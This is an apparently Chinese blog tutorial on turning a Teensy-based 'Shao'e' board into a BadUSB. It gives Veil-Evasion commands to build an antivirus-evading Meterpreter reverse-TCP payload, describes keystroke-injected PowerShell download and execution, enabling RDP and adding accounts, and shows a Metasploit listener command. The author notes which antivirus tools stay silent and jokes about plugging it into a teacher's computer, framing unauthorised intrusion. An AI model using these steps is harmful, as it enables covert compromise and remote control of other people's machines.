天天看點

利用燒鵝制作簡單BadUSB,插誰誰懷孕

所用硬體裝置為燒鵝,燒鵝是RadioWar基于Teensy++ 2.0 AT90USB1286晶片設計的USB Rubber Ducky類開發闆。 

使用veil編碼meterpreter生成payload(經過編碼的payload在殺軟中僅能夠存活幾分鐘),放到伺服器上。插入燒鵝,模拟鍵盤輸入,在cmd中下載下傳payload,并執行。 

0x1 利用veil編碼打造免殺的meterpreter 

root@kali:~# veil-evasion          //啟動veil 

[>] Please enter a command: list    //檢視可選清單 

26) python/meterpreter/rev_tcp 

利用燒鵝制作簡單BadUSB,插誰誰懷孕

[>] Please enter a command: 26     //這裡選擇編号為26的payload 

[>] Please enter a command: set LHOST 192.168.31.233  //設定LHOST 

利用燒鵝制作簡單BadUSB,插誰誰懷孕

[>] Please enter a command: generate             //對payload進行編碼 

[*] Press [enter] for 'payload' 

[>] Please enter the base name for output files: a   //輸入生成的payload名字 

[>] Please enter the number of your choice: 1 //選擇編碼方式 

利用燒鵝制作簡單BadUSB,插誰誰懷孕

[*] Executable written to: /root/veil-output/compiled/a1.exe  //生成經過編碼的payload位置 

0x2 将執行代碼寫入badusb中 

使用Arduino IDE 寫入,其中下載下傳使用的是PowerShell,如果使用vbs那種方法,360會報警

利用燒鵝制作簡單BadUSB,插誰誰懷孕

對于win7開啟3389,并加帳戶,使用

在學校中利用3389比meterpreter更加好用。開啟3389,殺軟不會提示。添加帳戶,360會提示,電腦管家不會提示。

對于執行修改dns等一些需要輸入中文的地方,就比較麻煩了,暫時還沒想到好的方法,隻想到模拟鍵盤輸入 Shift + Ctrl開啟輸入法....利用條件比較苛刻

0x3  等待目标連接配接 

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 E  //開始監聽,等待連接配接 

利用燒鵝制作簡單BadUSB,插誰誰懷孕

将USB插入目标機器,執行相關指令 

目标機器上線 

利用燒鵝制作簡單BadUSB,插誰誰懷孕

PS:玩法還有很多,還可以開啟目标機器3389,建立使用者等等,快要期末考試了,不要攔着我,我要去插下老師的機器......